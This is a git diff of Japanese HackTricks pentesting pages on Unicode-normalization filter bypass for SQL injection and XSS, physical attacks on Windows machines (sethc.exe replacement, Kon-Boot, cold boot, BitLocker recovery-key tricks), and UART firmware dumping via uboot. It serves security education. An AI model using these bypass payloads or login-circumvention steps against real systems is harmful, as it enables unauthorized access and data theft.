- **UTFのバリアント**UTF-8以外にも、UTF-16最低2バイト、最大4バイト、UTF-32すべての文字に4バイトを使用など、他のエンコーディング規格があります。
- **データ処理**:データを処理するシステムは、バイトストリームを文字に正しく変換するために使用されるエンコーディングを正確に把握している必要があります。
- **UTFのバリエーション**UTF-8以外にも、UTF-16最低2バイト、最大4バイト、UTF-32すべての文字に4バイトを使用など、他のエンコーディング規格があります。
Unicodeの複雑さとさまざまなエンコーディング方法から生じる潜在的な問題を効果的に処理し、緩和するためにこれらの概念を理解することが重要です。
これらの概念を理解することは、Unicodeの複雑さとそのさまざまなエンコーディング方法から生じる潜在的な問題を効果的に処理し、緩和するために重要です。
Unicodeが同じ文字を表す異なるバイトを正規化する例
```python
@ -45,19 +59,19 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
### 発見
Webアプリ内でエコーバックされている値を見つけることができれば、**'KELVIN SIGN' (U+0212A)** を送信してみることができます。これは **"K"に正規化** されます(`%e2%84%aa` として送信できます)。**"K" がエコーバック** された場合、**何らかのUnicode正規化** が行われています。
Webアプリ内でエコーバックされている値を見つけることができれば、**'KELVIN SIGN' (U+0212A)** を送信してみることができます。これは **"K" に正規化**されます(`%e2%84%aa` として送信できます)。**"K" がエコーバック**された場合、**何らかのUnicode正規化**が行われています。
他の **例**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83`**Unicode** 後に `Leonishan`なります。
他の**例**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83`**Unicode** 後に `Leonishan`正規化します。
## **脆弱性の例**
### **SQLインジェクションフィルター回避**
ユーザー入力を使用してSQLクエリを作成するために文字 `'` を使用しているWebページを想像してください。このWebは、セキュリティ対策として、ユーザー入力から文字 **`'`** のすべての出現を **削除** しますが、その削除後、クエリの作成の前に、ユーザーの入力を **Unicode** を使用して **正規化** します。
ユーザー入力を使用してSQLクエリを作成するために文字 `'` を使用しているWebページを想像してください。このWebは、セキュリティ対策として、ユーザー入力から文字 **`'`** のすべての出現を**削除**しますが、その削除後、クエリの作成の前に、ユーザーの入力を**Unicode**を使用して**正規化**します。
その後、悪意のあるユーザーは、`' (0x27)` に相当する異なるUnicode文字を挿入することができます。例えば `%ef%bc%87` を挿入すると、入力が正規化されると、シングルクォートが作成され、**SQLインジェクションの脆弱性** が発生します:
その後、悪意のあるユーザーは、`' (0x27)` に相当する異なるUnicode文字を挿入することができます。例えば `%ef%bc%87` を挿入すると、入力が正規化されると、シングルクォートが作成され、**SQLインジェクションの脆弱性**が発生します。
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (157) (1).png>)
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
**いくつかの興味深いUnicode文字**
@ -93,24 +107,36 @@ Webアプリ内でエコーバックされている値を見つけることが
Webアプリをだますために、以下の文字のいずれかを使用してXSSを悪用することができます
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (1).png>)
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
たとえば、最初の提案されたUnicode文字は、`%e2%89%ae`または`%u226e`として送信できます
たとえば、最初の提案されたUnicode文字は、`%e2%89%ae`または`%u226e`として送信できることに注意してください
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1).png>)
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
### ファジング正規表現
バックエンドが**正規表現でユーザー入力をチェック**している場合、**入力**が**正規表現のために正規化**されている可能性がありますが、**使用されている場所**では**正規化されていない**かもしれません。たとえば、Open RedirectやSSRFでは、正規表現が**送信されたURLを正規化**してから**そのままアクセス**するかもしれません。
ツール[**recollapse**](https://github.com/0xacb/recollapse)は、バックエンドをファジングするために**入力の変化を生成**することができます。詳細については、**github**とこの[**記事**](https://0xacb.com/2022/11/21/recollapse/)をチェックしてください。
バックエンドが**正規表現でユーザー入力をチェック**している場合、**入力**が**正規化**されている可能性がありますが、**使用されている**場所では**正規化されていない**かもしれません。たとえば、オープンリダイレクトやSSRFでは、正規表現が送信されたURLを**正規化**してから**そのままアクセス**するかもしれません。
ツール[**recollapse**](https://github.com/0xacb/recollapse)は、バックエンドをファジングするための入力の変化を生成することができます。詳細については、**github**とこの[**記事**](https://0xacb.com/2022/11/21/recollapse/)をチェックしてください。
## 参考文献
* [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックする無料の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、無料でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
@ -119,8 +145,8 @@ HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する
* **ハッキングトリックを共有するために、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォロー**してください。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
</details>

40
physical-attacks/physical-attacks.md
View file

@ -2,21 +2,35 @@
<details>
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を通じて、ゼロからヒーローまでAWSハッキングを学びましょう</summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFT**](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **ハッキングトリックを共有するために、** [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出する
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **Discordグループ**に参加する💬https://discord.gg/hRep4RUj7fまたは[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**🐦で私たちをフォローする[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **HackTricks**https://github.com/carlospolop/hacktricksと[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## BIOSパスワードの回復とシステムセキュリティ
**BIOSのリセット**はいくつかの方法で達成できます。ほとんどのマザーボードには、BIOS設定、パスワードを含む、をリセットする**バッテリー**が含まれており、約**30分**取り外すとリセットされます。また、マザーボード上の**ジャンパー**を調整して特定のピンを接続することで、これらの設定をリセットすることもできます。
**BIOSのリセット**はいくつかの方法で達成できます。ほとんどのマザーボードには、約**30分間**取り外すとBIOS設定パスワードを含むがリセットされる**バッテリー**が含まれています。また、マザーボード上の**ジャンパー**を調整して特定のピンを接続することで、これらの設定をリセットすることもできます。
ハードウェアの調整が不可能または実用的でない場合、**ソフトウェアツール**が解決策を提供します。**Kali Linux**などのディストリビューションを使用して**Live CD/USB**からシステムを実行すると、**_killCmos_**や**_CmosPWD_**などのツールにアクセスでき、BIOSパスワードの回復に役立ちます。
@ -30,17 +44,17 @@ BIOSパスワードが不明な場合、それを**3回間違えて**入力す
### RAM分析とCold Boot攻撃
RAMは、通常**1〜2分**の間、電源が切断された後もデータを一時的に保持します。この持続性は、液体窒素などの冷却物質を適用することで**10分**まで延長できます。この拡張された期間中、**dd.exe**や**volatility**などのツールを使用して**メモリダンプ**を作成し、分析することができます。
RAMは、通常**1〜2分**の間、電源が切断された後もデータを一時的に保持します。この持続性は、液体窒素などの冷却物質を適用することで**10分**延長できます。この拡張された期間中、**dd.exe**や**volatility**などのツールを使用して**メモリダンプ**を作成し、分析することができます。
### 直接メモリアクセスDMA攻撃
**INCEPTION**は、**FireWire**や**Thunderbolt**などのインターフェースと互換性があり、DMAを介した**物理メモリ操作**のためツールです。これにより、メモリをパッチして任意のパスワードを受け入れることで、ログイン手順をバイパスできます。ただし、**Windows 10**システムには効果がありません。
**INCEPTION**は、**FireWire**や**Thunderbolt**などのインターフェースと互換性があり、DMAを介した**物理メモリ操作**のために設計されたツールです。これにより、メモリをパッチして任意のパスワードを受け入れることで、ログイン手順をバイパスできます。ただし、**Windows 10**システムには効果がありません。
### システムアクセスのためのLive CD/USB
**_sethc.exe_**や**_Utilman.exe_**などのシステムバイナリを**_cmd.exe_**のコピーで変更すると、システム特権を持つコマンドプロンプトを提供できます。**chntpw**などのツールを使用して、Windowsインストールの**SAM**ファイルを編集してパスワードを変更できます。
**Kon-Boot**は、Windowsシステムにログインするのを容易にするツールで、WindowsカーネルやUEFIを一時的に変更することでパスワードを知らずにログインできます。詳細は[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)で確認できます。
**Kon-Boot**は、Windowsシステムにログインするのを容易にするツールで、WindowsカーネルやUEFIを一時的に変更ます。詳細は[https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/)で確認できます。
### Windowsセキュリティ機能の取り扱い
@ -52,7 +66,7 @@ RAMは、通常**1〜2分**の間、電源が切断された後もデータを
#### BAD USBデバイス
**Rubber Ducky**や**Teensyduino**などのデバイスは、悪意のあるUSBデバイスを作成するプラットフォームとして機能し、ターゲットコンピュータに接続されると事前定義されたペイロードを実行できます。
**Rubber Ducky**や**Teensyduino**などのデバイスは、悪意のあるUSBデバイスを作成するプラットフォームとして機能し、ターゲットコンピュータに接続されたときに事前定義されたペイロードを実行できます。
#### ボリュームシャドウコピー
@ -60,8 +74,8 @@ RAMは、通常**1〜2分**の間、電源が切断された後もデータを
### BitLocker暗号のバイパス
BitLocker暗号は、メモリダンプファイル**MEMORY.DMP**)内に**回復パスワード**が見つかった場合にバイパスできる可能性があります。この目的のために**Elcomsoft Forensic Disk Decryptor**や**Passware Kit Forensic**などのツールを利用できます。
BitLocker暗号は、メモリダンプファイル**MEMORY.DMP**)内で**回復パスワード**が見つかればバイパスできる可能性があります。この目的のために**Elcomsoft Forensic Disk Decryptor**や**Passware Kit Forensic**などのツールを利用できます。
### リカバリキーの追加のためのソーシャルエンジニアリング
新しいBitLockerリカバリキーは、ユーザーに新しいリカバリキーを追加するコマンドを実行させることで追加でき、これによりゼロで構成された新しいリカバリキーが復号化プロセスを簡素化します。
新しいBitLockerリカバリキーは、ユーザーに新しいリカバリキーを追加するコマンドを実行させることで追加でき、これにより復号化プロセスが簡素化されます。

82
todo/hardware-hacking/uart.md
View file

@ -9,18 +9,32 @@ HackTricksをサポートする他の方法
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする。
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で**@carlospolopm**をフォローする🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- **ハッキングトリックを共有するには、**[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スチーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## 基本情報
UARTはシリアルプロトコルであり、コンポーネント間でデータを1ビットずつ転送します。一方、並列通信プロトコルは複数のチャネルを通じてデータを同時に送信します。一般的なシリアルプロトコルにはRS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express、USBなどがあります。
UARTはシリアルプロトコルであり、コンポーネント間でデータを1ビットずつ転送します。一方、パラレル通信プロトコルは複数のチャネルを通じてデータを同時に送信します。一般的なシリアルプロトコルにはRS-232、I2C、SPI、CAN、Ethernet、HDMI、PCI Express、およびUSBが含まれます。
一般的に、UARTがアイドル状態にあるときは、ラインは高い論理1の値に保持されます。次に、データ転送の開始を示すために、送信機が開始ビットを受信機に送信します。この間、信号は低い論理0の値に保持されます。次に、送信機は、実際のメッセージを含む5〜8ビットのデータビットを送信し、オプションのパリティビットと1または2つのストップビット論理1の値が続きます。エラーチェックに使用されるパリティビットは実際にはほとんど見られません。ストップビットまたはビットは送信の終了を示します。
一般的に、UARTがアイドル状態にあるときは、ライン高い論理1の値に保持されます。次に、送信機が受信機にデータ転送の開始を示すために、開始ビットを送信します。この間、信号は低い論理0の値に保持されます。次に、送信機は、実際のメッセージを含む5〜8ビットのデータビットを送信し、オプションのパリティビットと、構成に応じて1または2つのストップビット論理1の値が続きます。エラーチェックに使用されるパリティビットは実際にはほとんど見られません。ストップビット(またはビット)は、送信の終わりを示します。
最も一般的な構成を8N1と呼びます8つのデータビット、パリティなし、1つのストップビット。たとえば、8N1 UART構成で文字C、またはASCIIで0x43を送信したい場合、次のビットを送信します0開始ビット0、1、0、0、0、0、1、1バイナリで0x43の値、および0ストップビット
最も一般的な構成を8N1と呼びます8ビットのデータ、パリティなし、1ビットのストップビット。たとえば、ASCIIで文字C、または0x43を送信したい場合、8N1 UART構成で次のビットを送信します0開始ビット0、1、0、0、0、0、1、1バイナリで0x43の値、および0ストップビット
![](<../../.gitbook/assets/image (761).png>)
@ -32,32 +46,32 @@ UARTと通信するためのハードウェアツール
### UARTポートの識別
UARTには4つのポートがあります**TX**(送信)、**RX**(受信)、**Vcc**(電圧)、および**GND**グラウンド。PCBに**`TX`**と**`RX`**の文字が**書かれている**4つのポートを見つけることができるかもしれません。ただし、明確な表示がない場合は、**マルチメーター**または**ロジックアナライザー**を使用して自分で見つける必要があるかもしれません。
UARTには4つのポートがあります**TX**(送信)、**RX**(受信)、**Vcc**(電圧)、および**GND**グラウンド。PCBに**`TX`**と**`RX`**の文字が**書かれている**4つのポートを見つけることができるかもしれません。ただし、指示がない場合は、**マルチメータ**または**ロジックアナライザ**を使用して自分で見つける必要があるかもしれません。
**マルチメータ**とデバイスの電源を切った状態で:
**マルチメータ**とデバイスの電源を切った状態で:
- **GND**ピンを特定するには、**連続性テスト**モードを使用し、バックリードをグラウンドに置き、赤いリードでテストして、マルチメータから音が聞こえるまで試してください。複数のGNDピンがPCB上に見つかる場合がありますので、UARTに属するピンを見つけたかどうかはわかりません。
- **VCCポート**を特定するには、**DC電圧モード**を設定し、電圧を20Vに設定します。黒いプローブをグラウンドに、赤いプローブをピンに置きます。デバイスの電源を入れます。マルチメーターが3.3Vまたは5Vの一定の電圧を測定した場合、Vccピンを見つけました。他の電圧が表示される場合は、他のポートで再試行してください。
- **TX** **ポート**を特定するには、**DC電圧モード**を20Vの電圧に設定し、黒いプローブをグラウンドに、赤いプローブをピンに置き、デバイスの電源を入れます。電源を入れると、一部のデバッグデータが送信されるため、数秒間電圧が変動し、その後Vcc値に安定する場合、おそらくTXポートを見つけました。これは、電源を入れると、一部のデバッグデータが送信されるためです。
- **RXポート**は他の3つに最も近いポートであり、UARTピンの中で最も低い電圧変動と最も低い全体値を持っています。
- **GND**ピンを特定するには、**連続性テスト**モードを使用し、バックリードをグラウンドに置き、赤いリードでテストして、マルチメータから音が聞こえるまで試してください。複数のGNDピンがPCB上に見つかる場合がありますので、UARTに属するものを見つけたかどうかはわかりません。
- **VCCポート**を特定するには、**DC電圧モード**を設定し、20Vの電圧に設定します。黒いプローブをグラウンドに、赤いプローブをピンに置きます。デバイスの電源を入れます。マルチメータが3.3Vまたは5Vの定電圧を測定した場合、Vccピンを見つけたことになります。他の電圧が表示される場合は、他のポートで再試行してください。
- **TX** **ポート**を特定するには、**DC電圧モード**を20Vの電圧に設定し、黒いプローブをグラウンドに、赤いプローブをピンに置き、デバイスの電源を入れます。電源を入れると、一部のデバッグデータが送信されるため、数秒間電圧が変動し、その後Vcc値に安定する場合、おそらくTXポートを見つけたことになります。
- **RXポート**は他の3つのポートに最も近く、UARTピンの中で最も低い電圧変動と最も低い全体的な値を持っています。
TXとRXポートを混同しても何も起こりませんが、GNDとVCCポートを混同すると回路を焼き切る可能性があります。
一部のターゲットデバイスでは、製造元によってUARTポートが無効にされている場合があります。その場合、基板内の接続を追跡し、いくつかのブレイクアウトポイントを見つけることが役立ちます。UARTの検出がないことと回路の切断を確認する強力なヒントは、デバイスの保証を確認することです。デバイスが保証付きで出荷された場合、製造元はいくつかのデバッグインターフェースこの場合はUARTを残しており、デバッグ中にUARTを切断し、再度接続する必要があります。これらのブレイクアウトピンは、はんだ付けまたはジャンパーワイヤーで接続できます。
一部のターゲットデバイスでは、製造元によってUARTポートが無効にされている場合があります。その場合、基板内の接続を追跡し、いくつかのブレイクアウトポイントを見つけることが役立ちます。UARTの検出がないことと回路の切断を確認する強力なヒントは、デバイスの保証を確認することです。デバイスが保証付きで出荷された場合、製造元はいくつかのデバッグインターフェイスこの場合はUARTを残し、デバッグ中にUARTを切断し、デバッグが終了すると再度接続します。これらのブレイクアウトピンは、はんだ付けまたはジャンパーワイヤーで接続できます。
### UARTボーレートの識別
正しいボーレートを特定する最も簡単な方法は、**TXピンの出力を見てデータを読み取ろうとする**ことです。受信したデータが読み取れない場合は、データが読み取れるまで次の可能なボーレートに切り替えてください。これには、USBシリアルアダプタやBus Pirateなどの多目的デバイスと、[baudrate.py](https://github.com/devttys0/baudrate/)などのヘルパースクリプトが必要です。最も一般的なボーレートは9600、38400、19200、57600、115200です。
正しいボーレートを特定する最も簡単な方法は、**TXピンの出力を見てデータを読み取ろうとする**ことです。受信したデータが読めない場合は、データが読めるまで次の可能なボーレートに切り替えてください。これには、USBシリアルアダプタやBus Pirateなどの多目的デバイスと、[baudrate.py](https://github.com/devttys0/baudrate/)などのヘルパースクリプトを使用できます。最も一般的なボーレートは9600、38400、19200、57600、115200です。
{% hint style="danger" %}
このプロトコルでは、1つのデバイスのTXを他のデバイスのRXに接続する必要があることに注意してください
{% endhint %}
## CP210X UART to TTYアダプタ
## CP210X UART to TTYアダプタ
CP210Xチップは、NodeMCUesp8266搭載などのプロトタイピングボードでシリアル通信に使用されます。これらのアダプタは比較的安価であり、ターゲットのUARTインターフェースに接続するために使用できます。デバイスには5つのピンがあります5V、GND、RXD、TXD、3.3V。ターゲットがサポートする電圧に接続して、損傷を防ぐようにしてください。最後に、アダプターのRXDピンをターゲットのTXDに、アダプタのTXDピンをターゲットのRXDに接続してください。
CP210Xチップは、NodeMCUesp8266搭載などのプロトタイピングボードでシリアル通信に使用されます。これらのアダプタは比較的安価であり、ターゲットのUARTインターフェースに接続するために使用できます。デバイスには5つのピンがあります5V、GND、RXD、TXD、3.3V。ターゲットがサポートする電圧に接続するように注意してください。最後に、アダプタのRXDピンをターゲットのTXDに、アダプタのTXDピンをターゲットのRXDに接続してください。
アダプタが検出されない場合は、ホストシステムにCP210Xドライバがインストールされていることを確認してください。アダプタが検出され、接続されたら、picocom、minicom、またはscreenなどのツールを使用できます。
アダプタが検出されない場合は、ホストシステムにCP210Xドライバがインストールされていることを確認してください。アダプタが検出され、接続されたら、picocom、minicom、またはscreenなどのツールを使用できます。
Linux/MacOSシステムに接続されたデバイスをリストアップするには
```
@ -79,13 +93,13 @@ minicom -s
UARTシリアルからUSBアダプタが利用できない場合、Arduino UNO R3をクイックハックとして使用できます。通常、どこでも入手可能なArduino UNO R3を使用することで、多くの時間を節約できます。
Arduino UNO R3には、ボード自体にUSBからシリアルへのアダプタが内蔵されています。UART接続を取得するには、ボードからAtmel 328pマイクロコントローラチップを抜き取るだけです。このハックは、Atmel 328pがボードにはんだ付けされていないArduino UNO R3バリアントで機能しますSMDバージョンが使用されています。ArduinoのRXピンデジタルピン0をUARTインターフェースのTXピンに、ArduinoのTXピンデジタルピン1をUARTインターフェースのRXピンに接続します。
Arduino UNO R3には、ボード自体にUSBからシリアルへのアダプタが内蔵されています。UART接続を取得するには、ボードからAtmel 328pマイクロコントローラチップを抜き取るだけです。このハックは、Atmel 328pがボードにはんだ付けされていないArduino UNO R3バリアントSMDバージョンが使用されている)で機能します。ArduinoのRXピンデジタルピン0をUARTインターフェースのTXピンに、ArduinoのTXピンデジタルピン1をUARTインターフェースのRXピンに接続します。
最後に、UARTインターフェースに応じてボーレートを設定して、Arduino IDEを使用することをお勧めします。
最後に、UARTインターフェースに応じてボーレートを設定して、Arduino IDEを使用することをお勧めします。メニューの`tools`セクションで`Serial Console`オプションを選択し、ボーレートを設定します。
## Bus Pirate
このシナリオでは、プログラムのすべての印刷物をシリアルモニタに送信しているArduinoのUART通信をスニッフすることになります。
このシナリオでは、プログラムのすべての出力をシリアルモニタに送信しているArduinoのUART通信をスニッフすることになります。
```bash
# Check the modes
UART>m
@ -157,19 +171,19 @@ Escritura inicial completada:
AAA Hi Dreg! AAA
waiting a few secs to repeat....
```
## UARTコンソールを使用してファームウェアをダンプする
## UARTコンソールを使用したファームウェアのダンプ
UARTコンソールは、ランタイム環境で基礎ファームウェアを操作するための優れた方法を提供します。ただし、UARTコンソールアクセスが読み取り専用の場合、多くの制約が発生する可能性があります。多くの組み込みデバイスでは、ファームウェアはEEPROMに保存され、揮発性メモリを持つプロセッサで実行されます。したがって、ファームウェアは読み取り専用のまま保持されます。製造時の元のファームウェアはEEPROM自体にあり、新しいファイルは揮発性メモリのため失われる可能性があるためす。そのため、組み込みファームウェアを操作する際にファームウェアをダンプすることは貴重な取り組みです。
UARTコンソールは、ランタイム環境で基礎ファームウェアを操作する優れた方法を提供します。ただし、UARTコンソールアクセスが読み取り専用の場合、多くの制約が発生する可能性があります。多くの組み込みデバイスでは、ファームウェアはEEPROMに保存され、揮発性メモリを持つプロセッサで実行されます。したがって、ファームウェアは製造時の元のファームウェアがEEPROM自体にあり、新しいファイルは揮発性メモリのため失われる可能性があるため読み取り専用に保持されます。そのため、組み込みファームウェアを操作する際にファームウェアをダンプすることは貴重な取り組みです。
これを行うための多くの方法があり、SPIセクションではさまざまなデバイスからファームウェアを直接EEPROMから抽出する方法が説明されています。ただし、物理デバイスや外部インタラクションを使用してファームウェアをダンプする前に、まずUARTを使用してファームウェアをダンプすることが推奨されています。
これを行うための多くの方法があり、SPIセクションではさまざまなデバイスからファームウェアを直接抽出する方法が説明されています。ただし、物理デバイスや外部インタラクションを使用してファームウェアをダンプする前に、まずUARTを使用してファームウェアをダンプすることが推奨されます。
UARTコンソールからファームウェアをダンプするには、まずブートローダにアクセスする必要があります。多くの人気ベンダーはLinuxをロードするために<u>uboot</u>Universal Bootloaderを使用しているため、<u>uboot</u>にアクセスすることが必要です。
UARTコンソールからファームウェアをダンプするには、まずブートローダにアクセスする必要があります。多くの人気ベンダーはLinuxをロードするために <b>uboot</b>Universal Bootloaderを使用しているため、<b>uboot</b>にアクセスすることが必要です。
<u>boot</u>ブートローダにアクセスするには、UARTポートをコンピュータに接続し、任意のシリアルコンソールツールを使用し、デバイスへの電源供給を切断します。セットアップが準備できたら、Enterキーを押して押し続けます。最後に、デバイスに電源を接続してブートさせます。
<b>boot</b>ブートローダにアクセスするには、UARTポートをコンピュータに接続し、任意のシリアルコンソールツールを使用し、デバイスへの電源供給を切断します。セットアップが準備できたら、Enterキーを押して押し続けます。最後に、デバイスに電源を接続してブートさせます。
これにより、<u>uboot</u>のロードが中断され、メニューが表示されます。 <u>uboot</u>コマンドを理解し、ヘルプメニューを使用してそれらをリストすることが推奨されます。これはおそらく`help`コマンドになるでしょう。異なるベンダーが異なる構成を使用しているため、それぞれを個別に理解する必要があります。
これにより、<b>uboot</b>のロードが中断され、メニューが表示されます。 <b>uboot</b>コマンドを理解し、それらをリストするためにヘルプメニューを使用することが推奨されます。これはおそらく `help` コマンドになります。異なるベンダーが異なる構成を使用しているため、それぞれを個別に理解することが必要です。
通常、ファームウェアをダンプするコマンドは次のとおりです:
通常、ファームウェアをダンプするためのコマンドは次のとおりです:
```
md
```
@ -179,20 +193,6 @@ Finally, just strip out all the unnecessary data from the log file and store the
```
binwalk -e <filename.rom>
```
これは、hexファイルで見つかったシグネチャに基づいて、EEPROMからの可能なコンテンツをリストします。
EEPROM内の可能な内容を、ヘックスファイルで見つかったシグネチャに基づいてリストします。
ただし、使用されている場合でも、<b>uboot</b>がアンロックされているとは限らないことに注意する必要があります。Enterキーが機能しない場合は、Spaceキーなどの異なるキーをチェックしてください。ブートローダーがロックされており中断されない場合、この方法は機能しません。デバイスのブート時にUARTコンソールの出力をチェックして、<b>uboot</b>が言及されているかどうかを確認してください。起動時に<b>uboot</b>が言及されるかもしれません。
<details>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong>を使用して、ゼロからヒーローまでAWSハッキングを学びましょう</summary>
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
